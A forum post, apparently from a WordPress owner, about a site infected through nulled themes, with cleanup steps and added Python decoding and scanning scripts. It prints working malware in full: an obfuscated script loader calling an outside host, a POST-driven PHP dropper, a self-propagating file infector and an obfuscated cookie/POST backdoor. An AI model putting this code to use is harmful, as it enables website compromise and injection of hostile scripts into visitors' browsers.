- Sep 8, 2019
Why do I post that?
Educational purpose. If anyone stumbles upon something similar to know how to deal with it in the best way possible.
Why did I get malware/hacked in the first place?
No one to blame but yourself. You decide what you are going to put on your web server and only you have the power to do so. Most likely poor hardening, configuration, outdated plugins/software, or malicious file uploaded directly by you.
Another good answer to this is:
Because hackers want to achieve something. From SEO to phishing/scam/steal data/just do harm/for fun because they can.
Ok, so many of you have been here. One of my projects just got defaced. That's the risk of using WordPress and using nulled themes and plugins. To be honest I normally scan the files before I upload them to the server, but lately I was just too bold because I wasn't finding anything suspicious since I'm using only Babiato and uploaded them straight to the server. Even though Babiato has its good reputation and members here always helped each other (also helped me many times), there is always the option that one out of 1000 uploaders decides to put something funny in his uploads.
How to clean the hack?
1. Backup the hacked web server as is (with the malware)
2. Backup the DB files
3. Create a virtual machine
4. Sync the server to the virtual machine
5. Nuke the god damn server with the ground
6. Forbid its access to the WWW and scan the virtual machine using tools like clamAV, aibolit, wordfence and
7. Clean all the folders and files manually by removing them and removing strings in the code
8. Clean the database manually
9. Set the new server from the ground up
10. Harden the server
11. Change all your db names and passwords
12. Make an rsync backup every week and keep it somewhere on your PC
What exactly is that malware doing?
It has a php/js file that executes the malware. Normally it's not a rootkit but just a normal malware that spreads across all folders that have www-data user access in the main public_html folder.
In my case, I think what installs the functions of the malware was masked as an .ico
then it shits all over your .JavaScript and .PHP also .JSON and tries to replicate a malicious code.
Here is an example of how it looks.
Redirection to:
The part that you have to GREP in JS/PHP:
Code:
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
Decoded it looks like this:
JavaScript:
// Same loader with the String.fromCharCode() calls replaced by the strings they produce
Element.prototype.appendAfter = function(element) {
    element.parentNode.insertBefore(this, element.nextSibling);
}, false;
(function() {
    var elem = document.createElement('script');
    elem.type = 'text/javascript';
    elem.src = 'https://store.dontkinhooot.tw/stat.js';
    elem.appendAfter(document.getElementsByTagName('script')[0]);
    elem.appendAfter(document.getElementsByTagName('head')[0]);
    document.getElementsByTagName('head')[0].appendChild(elem);
})();
Element.prototype.appendAfter = function(element) {
    element.parentNode.insertBefore(this, element.nextSibling);
}, false;
(function() {
    var elem = document.createElement('script');
    elem.type = 'text/javascript';
    elem.src = 'https://store.dontkinhooot.tw/stat.js';
    elem.appendAfter(document.getElementsByTagName('script')[0]);
    elem.appendAfter(document.getElementsByTagName('head')[0]);
    document.getElementsByTagName('head')[0].appendChild(elem);
})();
var isIE=!1,isEdge=!1;
Check your WordPress for files like wp-stream.php, wp-xmlrpc.php (there shouldn't be any wp-xmlrpc.php, only xmlrpc.php, in a default WP install)
wp-stream.php content
PHP:
<?php
if (isset($_POST['lt']) && md5($_POST['lt']) == base64_decode("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=")) {
    $lt = base64_decode($_POST['a']);
    file_put_contents('lte_', '<?php ' . $lt);
    $lt = 'lte_';
    if (file_exists($lt)) {
        include($lt);
        unlink($lt);
    }
}
?>
Decoded it looks like this:
PHP:
<?php
// Same file with the base64 literal decoded: a POST password check, then the
// POSTed payload is written to lte_, included (run) and deleted again
if (isset($_POST['lt']) && md5($_POST['lt']) == '023258bbeb7ce955a690dca056be885d') {
    $lt = base64_decode($_POST['a']);
    file_put_contents('lte_', '<?php ' . $lt);
    $lt = 'lte_';
    if (file_exists($lt)) {
        include($lt);
        unlink($lt);
    }
}
?>
I also noticed this not long ago, they may be connected:
(This you can find in your home page when looking at the view page source)
HTML:
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">
<a style="font-size:18px;" href="https://downapkmod.com/" title="https://downapkmod.com/">https://downapkmod.com/</a>,
<a style="font-size:18px;" href="https://apkcop.com/" title="https://apkcop.com/">https://apkcop.com/</a>
</div>
lte_ content
Code:
<?php
ini_set('max_execution_time', '300');
ini_set('memory_limit', '-1');
$files = array();
$b = "/../../../../../../../../"; // unused
$l = "/";
// First pass: collect every file under the web root whose name contains ".js"
$it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT']);
$display = Array ( 'php' ); // unused
$search = Array('.js');
$files_ar = array(); // unused
foreach(new RecursiveIteratorIterator($it) as $file)
{
    if (strpos($file->getFilename(),'.js') == true || strpos($file->getFilename(),'.js') == true)
    {
        $q = strposa($file->getFilename(), $search);
        if($q != ""){
            array_push($files,$file->getPathname());
        }
    }
}
foreach($files as $onefile) {
    make_work($onefile);
}
// Then climb up to seven directory levels above the web root and repeat, which is
// how it reaches every other site the www-data user can write to. $files is never
// emptied, so files found on an earlier pass are rewritten again on every later pass.
for ($i = 1; $i < 8; $i++) {
    $l .= "../";
    try {
        $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'].$l);
        $display = Array ( 'php' );
        $search = Array('.js');
        $files_ar = array();
        foreach(new RecursiveIteratorIterator($it) as $file)
        {
            if (strpos($file->getFilename(),'.js') == true || strpos($file->getFilename(),'.js') == true)
            {
                $q = strposa($file->getFilename(), $search);
                if($q != ""){
                    array_push($files,$file->getPathname());
                }
            }
        }
        foreach($files as $onefile) {
            make_work($onefile);
        }
    } catch (Exception $e) {
    }
}
// Returns the matched needles joined with "|", or "" when none of them occurs
function strposa($haystack, $needle, $offset=0) {
    if(!is_array($needle)) $needle = array($needle);
    $stroke = "";
    foreach($needle as $query) {
        if(strpos($haystack, $query, $offset) !== false) { $stroke .= $query."|";}
    }
    return $stroke;
}
// Prepends the obfuscated loader to a file unless a marker string is already present.
// The marker it checks for decodes to "for.dontkinhooot.tw", but the loader it writes
// uses "store.dontkinhooot.tw", so the check never matches and each run prepends
// another copy (hence the repeated copies in the grep sample above).
function make_work($f){
    $g = file_get_contents($f);
    if (strpos($g, '102,111,114,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119') !== false) {
    } else {
        $l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
        $g = file_get_contents($f);
        $g = $l2.$g;
        @system('chmod 777 '.$f); // makes the file world-writable before rewriting it
        @file_put_contents($f,$g);
        echo $f."<br />";
    }
}
randomstring.php
Code:
<?php
// Function names and a key are assembled from character positions of $vrtna so
// that none of them appears in clear text; every cookie/POST value is then
// unpacked, XOR-ed with a key derived from its name and, when it splits into
// the expected number of parts, executed.
$vrtna = '90b_xpdt*l63k8#yancofsrgmuvH72451\'ei-';
$umcear = Array();
$umcear[] = $vrtna[27].$vrtna[8];
$umcear[] = $vrtna[18].$vrtna[22].$vrtna[34].$vrtna[16].$vrtna[7].$vrtna[34].$vrtna[3].$vrtna[20].$vrtna[25].$vrtna[17].$vrtna[18].$vrtna[7].$vrtna[35].$vrtna[19].$vrtna[17];
$umcear[] = $vrtna[29].$vrtna[10].$vrtna[18].$vrtna[32].$vrtna[10].$vrtna[31].$vrtna[2].$vrtna[34].$vrtna[36].$vrtna[1].$vrtna[10].$vrtna[31].$vrtna[18].$vrtna[36].$vrtna[30].$vrtna[31].$vrtna[11].$vrtna[29].$vrtna[36].$vrtna[13].$vrtna[13].$vrtna[18].$vrtna[30].$vrtna[36].$vrtna[30].$vrtna[0].$vrtna[11].$vrtna[30].$vrtna[1].$vrtna[29].$vrtna[20].$vrtna[29].$vrtna[29].$vrtna[13].$vrtna[28].$vrtna[10];
$umcear[] = $vrtna[14];
$umcear[] = $vrtna[18].$vrtna[19].$vrtna[25].$vrtna[17].$vrtna[7];
$umcear[] = $vrtna[21].$vrtna[7].$vrtna[22].$vrtna[3].$vrtna[22].$vrtna[34].$vrtna[5].$vrtna[34].$vrtna[16].$vrtna[7];
$umcear[] = $vrtna[34].$vrtna[4].$vrtna[5].$vrtna[9].$vrtna[19].$vrtna[6].$vrtna[34];
$umcear[] = $vrtna[21].$vrtna[25].$vrtna[2].$vrtna[21].$vrtna[7].$vrtna[22];
$umcear[] = $vrtna[16].$vrtna[22].$vrtna[22].$vrtna[16].$vrtna[15].$vrtna[3].$vrtna[24].$vrtna[34].$vrtna[22].$vrtna[23].$vrtna[34];
$umcear[] = $vrtna[21].$vrtna[7].$vrtna[22].$vrtna[9].$vrtna[34].$vrtna[17];
$umcear[] = $vrtna[5].$vrtna[16].$vrtna[18].$vrtna[12];
foreach ($umcear[8]($_COOKIE, $_POST) as $mcysgb => $slevav){
    function ytmnrg($umcear, $mcysgb, $cbodj){
        return $umcear[7]($umcear[5]($mcysgb . $umcear[2], ($cbodj / $umcear[9]($mcysgb)) + 1), 0, $cbodj);
    }
    function etbln($umcear, $uvrzj){
        return @$umcear[10]($umcear[0], $uvrzj);
    }
    function jvjpux($umcear, $uvrzj){
        $mltsule = $umcear[4]($uvrzj) % 3;
        if (!$mltsule) {
            $kbjfl = $umcear[1];
            $wtmzk = $kbjfl("", $uvrzj[1]($uvrzj[2]));
            $wtmzk();
            exit();
        }
    }
    $slevav = etbln($umcear, $slevav);
    jvjpux($umcear, $umcear[6]($umcear[3], $slevav ^ ytmnrg($umcear, $mcysgb, $umcear[9]($slevav))));
}
To the so called hackers:
Annoying I admit... you now force me to use docker for every single website installation and find other ways to protect myself.
To the people that got hacked:
Try to share what you got, how you think you got it, but don't insist and blame someone if you don't have the evidence. Sharing helps others protect against similar attacks and figuring out how they got hacked in the first place.
PS: I found the core of the code before it deleted itself (have my ways) but I am not publishing it because it can be used the other way around.
test edit because I have some error when editing
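The following is an added example and not part of the original post: a small Python script that does the decoding the post did by hand (turning `String.fromCharCode(...)` lists back into strings), pulls the remote script URL out of the loader, and strips every prepended copy of it from a .js file, as step 7 ("removing strings in the code") calls for. The infected sample is constructed from the loader quoted above; the function names are this example's own.

```python
"""Decode and strip the String.fromCharCode script loader shown in the post."""
import re
from typing import List, Tuple

# One copy of the loader, verbatim from the post's grep sample.
LOADER = (
    "Element.prototype.appendAfter = function(element) "
    "{element.parentNode.insertBefore(this, element.nextSibling);}, false;"
    "(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); "
    "elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); "
    "elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,"
    "116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);"
    "elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);"
    "elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);"
    "document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();"
)

# Constructed sample of an infected .js file: three prepended copies, as in the post,
# followed by what used to be the file's own first statement.
SAMPLE_INFECTED_JS = LOADER * 3 + "var isIE=!1,isEdge=!1;\n"

# The marker make_work() in lte_ looks for before deciding whether to infect a file again.
MARKER_CODEPOINTS = "102,111,114,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119"

FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")
URL_RE = re.compile(r'"(https?://[^"\s]+)"')
# One whole loader: from its distinctive first statement to the IIFE's closing "})();"
LOADER_RE = re.compile(
    r"Element\.prototype\.appendAfter = function\(element\) \{.*?\}\)\(\);", re.DOTALL
)


def decode_codepoints(digits: str) -> str:
    """Turn a comma-separated list of code points into text ("115,99" -> "sc")."""
    return "".join(chr(int(n)) for n in digits.split(",") if n.strip())


def decode_fromcharcode(js: str) -> str:
    """Replace every String.fromCharCode(...) call with the equivalent quoted literal."""
    def to_literal(m: "re.Match[str]") -> str:
        text = decode_codepoints(m.group(1))
        return '"' + text.replace("\\", "\\\\").replace('"', '\\"') + '"'
    return FROMCHARCODE_RE.sub(to_literal, js)


def extract_urls(js: str) -> List[str]:
    """URLs that only become visible once the fromCharCode calls are decoded."""
    found: List[str] = []
    for url in URL_RE.findall(decode_fromcharcode(js)):
        if url not in found:
            found.append(url)
    return found


def strip_loader(js: str) -> Tuple[str, int]:
    """Remove every copy of the loader; returns (cleaned source, copies removed)."""
    return LOADER_RE.subn("", js)


if __name__ == "__main__":
    print("marker checked by lte_:", decode_codepoints(MARKER_CODEPOINTS))
    print("loader fetches from   :", extract_urls(SAMPLE_INFECTED_JS))
    cleaned, removed = strip_loader(SAMPLE_INFECTED_JS)
    print(f"removed {removed} copies, remaining source: {cleaned!r}")
```

Running `decode_codepoints` on the marker that `make_work()` checks for gives `for.dontkinhooot.tw`, while the loader it writes uses `store.dontkinhooot.tw`, so the check never matches and every run of lte_ prepends one more copy; that is why the grep sample above contains the loader three times. When cleaning a real tree, diff the `strip_loader` output against a fresh copy of the theme or plugin rather than trusting the regex alone, since a file can carry more than this one loader.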
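A second added example, again not from the post or from any tool it names: a scanner for the offline VM copy made in steps 3 to 6. Instead of matching the exact bytes of the files quoted above, it flags the traits they share (a fromCharCode loader, a write-include-unlink dropper, a dynamic call fed straight from `$_COOKIE`/`$_POST`, `chmod 777` through `system()`, a zero-size absolutely positioned link block, PHP behind an image extension, and the non-core file names the post lists). The sample web root, the indicator labels and the stand-in files are all constructed for this example.

```python
"""Scan a copy of a hacked web root for the file traits described in the post."""
import os
import re
import shutil
import tempfile
from typing import List, Tuple

# Content traits, constructed for this example from the files shown in the post
# (illustrative checks, not a vendor signature set).
CONTENT_INDICATORS = [
    ("fromCharCode loader",
     re.compile(r"String\.fromCharCode\(\s*\d+(?:\s*,\s*\d+){5,}\s*\)")),
    ("write-include-unlink dropper",
     re.compile(r"file_put_contents\(.*?include\(.*?unlink\(", re.DOTALL)),
    ("superglobal-driven dynamic call",
     re.compile(r"\$\w+\[\d+\]\s*\(\s*\$_(?:COOKIE|POST|GET|REQUEST)\b")),
    ("chmod 777 via system()",
     re.compile(r"system\(\s*['\"]chmod\s+777\b")),
    ("zero-size link block",
     re.compile(r"height:\s*0(?:pt|px);\s*width:\s*0(?:pt|px);[^>]*>\s*<a\b", re.DOTALL)),
]

# Names the post calls out as not belonging to a default WordPress install.
SUSPICIOUS_NAMES = {"wp-stream.php", "wp-xmlrpc.php", "lte_"}
IMAGE_EXTENSIONS = (".ico", ".png", ".jpg", ".jpeg", ".gif")


def classify_file(path: str) -> List[str]:
    """Labels for one file; an empty list means nothing matched."""
    labels: List[str] = []
    name = os.path.basename(path)
    if name in SUSPICIOUS_NAMES:
        labels.append("non-core file name")
    with open(path, "rb") as fh:
        text = fh.read().decode("utf-8", errors="replace")
    # An "image" that opens with a PHP tag is code in disguise (the .ico the post mentions).
    if name.lower().endswith(IMAGE_EXTENSIONS) and text.lstrip().startswith("<?php"):
        labels.append("PHP code in image file")
    for label, pattern in CONTENT_INDICATORS:
        if pattern.search(text):
            labels.append(label)
    return labels


def scan_tree(root: str) -> List[Tuple[str, str]]:
    """Walk the copied web root and return sorted (relative path, label) findings."""
    findings: List[Tuple[str, str]] = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            findings.extend((rel, label) for label in classify_file(full))
    return sorted(findings)


# Constructed sample tree: the webshell quoted in the post, stand-ins for the other
# traits it describes, and two clean files that must not be flagged.
SAMPLE_FILES = {
    "wp-stream.php": (
        "<?php if(isset($_POST['lt']) && md5($_POST['lt']) == "
        "base64_decode(\"MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=\") ) "
        "{$lt = base64_decode($_POST['a']);file_put_contents('lte_','<?php '.$lt);"
        "$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);}} ?>"
    ),
    "lte_": "<?php @system('chmod 777 '.$f); /* constructed stub of the dropped file */ ?>",
    "index.php": (
        '<?php get_header(); ?>\n'
        '<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">\n'
        '<a style="font-size:18px;" href="https://downapkmod.com/">https://downapkmod.com/</a>\n'
        '</div>\n'
    ),
    "wp-content/themes/t/js/app.js":
        "var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116));\n",
    "wp-content/uploads/favicon.ico": "<?php /* constructed stand-in for PHP hidden in an .ico */ ?>",
    "wp-content/uploads/randomstring.php":
        "<?php foreach ($umcear[8]($_COOKIE, $_POST) as $k => $v) { /* constructed stub */ } ?>",
    "xmlrpc.php": "<?php /* legitimate core file, placeholder */ ?>\n",
    "wp-content/themes/t/functions.php": "<?php add_action('init', 'theme_setup'); ?>\n",
}


def scan_sample() -> List[Tuple[str, str]]:
    """Write the sample tree to a temp dir, scan it, clean up and return the findings."""
    root = tempfile.mkdtemp(prefix="webroot-")
    try:
        for rel, content in SAMPLE_FILES.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(content)
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel, label in scan_sample():
        print(f"{label:32} {rel}")
```

Point `scan_tree()` at the synced copy inside the VM, not at the live server, and treat every hit as a file to compare against a clean WordPress, theme or plugin download before deleting it: the trait checks are deliberately broad (a minifier can emit long `fromCharCode` lists too), so they are a worklist for the manual clean-up in step 7, not a verdict.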